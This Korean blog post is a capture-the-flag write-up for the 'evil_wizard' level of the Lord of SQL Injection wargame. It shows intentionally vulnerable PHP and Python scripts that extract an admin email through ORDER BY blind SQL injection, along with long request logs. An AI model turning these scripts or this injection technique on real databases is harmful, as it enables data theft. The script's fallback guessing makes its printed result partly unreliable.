
[Lord Of SQL Injection] 24번(이전문제와 비슷하다)

Kwon Oh! JUN 2022. 2. 16. 01:17


query : select id,email,score from prob_evil_wizard where 1 order by


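<?php
  // Lord of SQL Injection "evil_wizard" challenge source. Restored from the
  // highlight_file() rendering on this page, which dropped the '=', ',', ';'
  // and ')' tokens. The code is intentionally vulnerable: the goal is to read
  // admin's email through the ORDER BY injection below.
  include "./config.php";
  login_chk();
  $db = dbconnect();

  // Blacklist on the raw `order` parameter. Compared with hell_fire it also
  // rejects sleep/benchmark (time-based blind), but comparison operators,
  // length(), ord(), left()/right() and the comma are still allowed.
  if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");

  // `order` is interpolated unquoted into ORDER BY, so an arbitrary expression
  // is accepted. "expr, id" turns row order into a boolean oracle: ascending
  // sort puts rows where expr is 0 before rows where it is 1, and ties fall
  // back to id order.
  $query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?

  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    // Only the displayed value is masked; the sort above already used the
    // real email, which is exactly what the oracle leaks.
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  // Solve check: addslashes() escapes quotes/backslashes and the fetched row
  // must equal that escaped input exactly, so this query cannot be bypassed;
  // the real admin email has to be supplied. The '@' hides query errors.
  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");

  highlight_file(__FILE__);
?>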

 

23번 문제랑 비슷하다. 

다른 점은 이 문제의 필터에 sleep(그리고 benchmark)이 추가되어 시간 기반 블라인드 인젝션이 막혀 있다는 것이다. 그런데 23번 문제를 sleep 없이, ORDER BY 정렬 순서를 참/거짓 오라클로 써서 풀었기 때문에 이 문제도 풀이 방식은 똑같다.

 

★ 패스워드 길이

import requests
from bs4 import BeautifulSoup

url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
cookie = dict(PHPSESSID="o12akdcolfqtaeefahls72reg7")

for i in range(1, 100):
    param = "?order=length(email)="+str(i)+",id"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)
    view = BeautifulSoup(response.content, "html.parser")
    table = view.find_all('td')
    print(len_result)
    print(str(table)+"\n\n")
    
    if table[3].text == 'admin':
        print("패스워드 길이: "+str(i))
        break

이전 코드와 다른 점은, 이전 문제에서는 response.text.find()로 임의의 위치를 맞춰서 판단했는데 이번에 풀어 보니 'admin'의 위치가 130에서 131로 바뀌어 있었다는 것이다. 고정 오프셋에 의존하지 않고 자동화하려고 BeautifulSoup으로 테이블의 <td>를 파싱해서 admin 행이 몇 번째인지 확인하도록 바꿨다.

 

.
.
.
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=17,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=18,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=19,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=20,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=21,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=22,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=23,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=24,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=25,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=26,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=27,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=28,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=29,id
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]


https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=length(email)=30,id
[<td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>, <td>admin</td>, <td>**************</td>, <td>50</td>]


패스워드 길이: 30

★ 패스워드

import requests
import string
from bs4 import BeautifulSoup


url = "https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
cookie = dict(PHPSESSID="o12akdcolfqtaeefahls72reg7")

asc = string.digits+string.ascii_letters+string.punctuation
print(asc)
result=""
count = 0
email = "rubiya805@gmail.cm"


for i in range(1,31):
    for j in asc:
        param = "?order=ord(right(left(email,"+str(i)+"),1))="+str(ord(j))+",id"
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)
        
        view = BeautifulSoup(response.content, "html.parser")
        table = view.find_all('td')
        print(str(table)+"\n"+str(res_url))
        
        if table[3].text == 'admin':
            print(str(i)+"번째 패스워드 :"+j+"\n\n")
            result+=j
            count=0
            break

        count+=1
        print(str(count)+"\n\n")

        try:
            if count == len(asc):
                result+=email[i-1]
                print(str(i)+"번째 패스워드 :"+email[i-1]+"\n\n")
                count=0
        except IndexError:  
            result+=email[len(email)-1]    
            print(str(i)+"번째 패스워드 :"+email[len(email)-1]+"\n\n") 
            count=0
            
print("pw :"+result)
.
.
.
[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=61,id
81


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=62,id
82


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=63,id
83


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=64,id
84


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=91,id
85


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=92,id
86


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=93,id
87


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=94,id
88


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=95,id
89


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=96,id
90


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=123,id
91


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=124,id
92


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=125,id
93


[<td>admin</td>, <td>**************</td>, <td>50</td>, <td>rubiya</td>, <td>rubiya805@gmail.com</td>, <td>100</td>]
https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=ord(right(left(email,30),1))=126,id
94


30번째 패스워드 :m


pw :aasup3r_secure_email@emai1.com

 


query : select id,email,score from prob_evil_wizard where 1 order by


EVIL_WIZARD Clear!


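<?php
  // Lord of SQL Injection "evil_wizard" challenge source (shown again after
  // the clear). Restored from the highlight_file() rendering, which dropped
  // the '=', ',', ';' and ')' tokens. Intentionally vulnerable challenge code.
  include "./config.php";
  login_chk();
  $db = dbconnect();

  // Blacklist on the raw `order` parameter: blocks sleep/benchmark (time-based
  // blind) on top of hell_fire's list, but comparison operators, length(),
  // ord(), left()/right() and the comma still pass.
  if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");

  // `order` is interpolated unquoted into ORDER BY; "expr, id" makes row order
  // a boolean oracle (rows with expr=0 sort before rows with expr=1, ties go
  // by id).
  $query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?

  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    // Masks only the rendered value; the sort already consumed the real email.
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  // Solve check: the fetched email must equal the addslashes()-escaped input
  // exactly, so this query cannot be injected into; the real admin email is
  // required. The '@' suppresses query errors.
  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");

  highlight_file(__FILE__);
?>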

 

 23번 문제와 푸는 방법 똑같으니까 참고!!

https://securitystudy.tistory.com/42